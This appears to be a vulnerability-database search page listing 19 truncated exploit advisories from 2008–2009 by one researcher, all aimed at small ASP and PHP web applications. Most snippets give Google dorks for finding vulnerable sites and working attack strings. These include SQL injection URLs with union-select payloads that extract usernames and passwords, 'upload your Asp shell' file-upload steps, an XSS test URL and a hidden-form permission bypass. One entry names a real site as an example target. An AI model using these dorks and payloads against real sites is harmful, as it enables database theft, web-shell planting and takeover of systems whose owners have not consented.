19 matches found
Unfixed XSS vulnerability at z0ne-h.org
Security researcher AleminKrali, has submitted on 11/03/2008 a cross-site-scripting XSS vulnerability affecting z0ne-h.org, which at the time of submission ranked 4045417 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 19/03/2008. It is current...
DUgallery - ALL VERSIONS (Upload/SQL/) Multiple Remote Vulnerabilities
DUgallery - ALL VERSIONS! Discovered bay : AleminKrali my blog: al3m.blogspot.com inurl:pic.asp?iCat= inurl:cat.asp?iCat= - 1-Upload Bug HIGH!!! 75 success new! 1-OPEN firefox 2-tools options content JavaScript Not Active! and save.re open firefox. http://site.com/path/add.asp == upload your Asp...
aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities
No description provided by source. - Discovered bay AleminKrali ==== - aspWebAlbum 3.2 - Script Download "http://www.fullrevolution.com" - aspWebAlbum 3.2 Single Site License | $60.00 : - HomePage al3m.blogspot.com...
aspwebalbum 3.2 - Multiple Vulnerabilities
aspwebalbum 3.2 - Multiple Vulnerabilities - Discovered by AleminKrali - aspWebAlbum 3.2 - Script Download "http://www.fullrevolution.com" - aspWebAlbum 3.2 Single Site License | $60.00 : - HomePage al3m.blogspot.com - [email protected] - Dork ? : album.asp?pic= .jpg cat=...
aspwebalbum 3.2 - Multiple Vulnerabilities
Discovered by AleminKrali - aspWebAlbum 3.2 - Script Download "http://www.fullrevolution.com" - aspWebAlbum 3.2 Single Site License | $60.00 : - HomePage al3m.blogspot.com - [email protected] - Dork ? : album.asp?pic= .jpg cat=...
WESPA Calendário v1.1 Sql Injection Vulnerability
WESPA Calendrio v1.1 Sql Injection Vulnerability - Discovered by : AleminKrali - My Site : al3m.blogspot.com - Script Download : http://www.scriptbrasil.com.br/download/codigo/6502/ - Admin Panel : /scriptpath/useradmin.php - Exploit :...
Vbulletin Plugin ChatBox Xss Vulnerability
Vbulletin Plugin ChatBox Xss Vulnerability Discovered By AleminKrali [email protected] www.al3m.blogspot.com Greetz : BeyazKurt,Kerem125,Cr@zyKing,Ercu145,Abo Mohammed Net Devil High Risk Vulnerability! Xss Working!note:You login site and xss try. Ex: http://www.localhost/misc.php?do=ccarc&cbt=xss...
Magnet Blog Sql Injection Vulnerability
Title:Magnet Blog Sql Injection Vulnerability Discovered by : AleminKrali Dork: "intitle:Magnet Blog" Download:www.aspindir.com/Goster/4217 Exploit:Http://www.site.com/scriptpath/yazidetay.asp?id=-999 union select 0,user,2,pass,4,5 from user Example:...
NeBoard Sql Injection Vulnerability
Discovered by : AleminKrali NeBoard Sql Injection Vulnerability Post Sql Dork :inurl:show.asp?id= ref= step= level= page= 2 html form 1.Form:It takes it:ID NAME 2.Form:Admin Password and later HTTP://SITE.COM/admin/boardedit.asp?id=IDNAME we are entering and 2.form Admin Password ile Login we are...
Unfixed XSS vulnerability at www.fenerbahce.com
Security researcher AleminKrali, has submitted on 23/07/2008 a cross-site-scripting XSS vulnerability affecting www.fenerbahce.com, which at the time of submission ranked 9367 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 17/06/2009. It is...
OkulAjansi [ID] Remote SQL Injection Vulnerability
Title:OkulAjansi ID Remote SQL Injection Vulnerability Discovered by : AleminKrali Dork :inurl:ReDirect.Asp?CatID= Exploit:HTTP://SITE.COM/SCRIPT//default.asp?Mode=7&ID=85 union+select+all+0,kullanici,2,sifre,4,5,6,7,8,9,10,11,12,13+from+uyeler Example:...
MorASP Anket Sistemi v2.0 [PID] Bypass Vulnerability (tr)
Title:MorASP Anket Sistemi v2.0 PID Bypass Vulnerability tr Discovered by : AleminKrali Dork :MorASP Download:http://www.aspdepo.org/tr/indir2.asp?id=460 Exploit:HTTP://SITE.COM/SCRIPT//ynt.asp?pid=Edit Number ID Ex:1,2,3,4,5 Example: http://www.istiklalcaddesi.net/anketfalan/ynt.asp?PID=15...
Turuncu Galeri[galeri_edit.asp]Permission Bypass Vulnerability
Title:Turuncu Galerigaleriedit.aspPermission Bypass Vulnerability Discovered by : AleminKrali Dork :resimdetay.asp?id= Html Form form action="http://www.SITE.COM/PATH/yonet/galeriedit.asp" method="post" input type="hidden" name="update" value="1" input type="hidden" name="id" value="EDIT TO IMAGE...
AspWebCalendar 2008 Remote File Upload Vulnerability
Title:AspWebCalendar 2008 Remote File Upload Vulnerability Discovered by : AleminKrali Dork :calendar.asp?eventdetail http://site.com/path/calendaradmin.asp?action=uploadfile == upload your Asp shell http://site.com/path/calendar/eventimages/yourshell.asp == your address upload form FORM...
AspWebCalendar 2008 Remote File Upload Vulnerability
No description provided by source. Title:AspWebCalendar 2008 Remote File Upload Vulnerability Discovered by : AleminKrali Dork :calendar.asp?eventdetail http://site.com/path/calendaradmin.asp?action=uploadfile == upload your Asp shell http://site.com/path/calendar/eventimages/yourshell.asp == you...
AspWebCalendar 2008 - Arbitrary File Upload
AspWebCalendar 2008 - Arbitrary File Upload Title:AspWebCalendar 2008 Remote File Upload Vulnerability Discovered by : AleminKrali Dork :calendar.asp?eventdetail http://site.com/path/calendaradmin.asp?action=uploadfile == upload your Asp shell http://site.com/path/calendar/eventimages/yourshell.a...
aspwebcal-upload.txt
Title:AspWebCalendar 2008 Remote File Upload Vulnerability Discovered by : AleminKrali Dork :calendar.asp?eventdetail http://site.com/path/calendaradmin.asp?action=uploadfile == upload your Asp shell http://site.com/path/calendar/eventimages/yourshell.asp == your address upload form...
AspWebCalendar 2008 - Arbitrary File Upload
Title:AspWebCalendar 2008 Remote File Upload Vulnerability Discovered by : AleminKrali Dork :calendar.asp?eventdetail http://site.com/path/calendaradmin.asp?action=uploadfile == upload your Asp shell http://site.com/path/calendar/eventimages/yourshell.asp == your address upload form...
AspWebCalendar 2008 Remote File Upload Vulnerability
Exploit for unknown platform in category web applications ==================================================== AspWebCalendar 2008 Remote File Upload Vulnerability ==================================================== Discovered by : AleminKrali Dork :calendar.asp?eventdetail...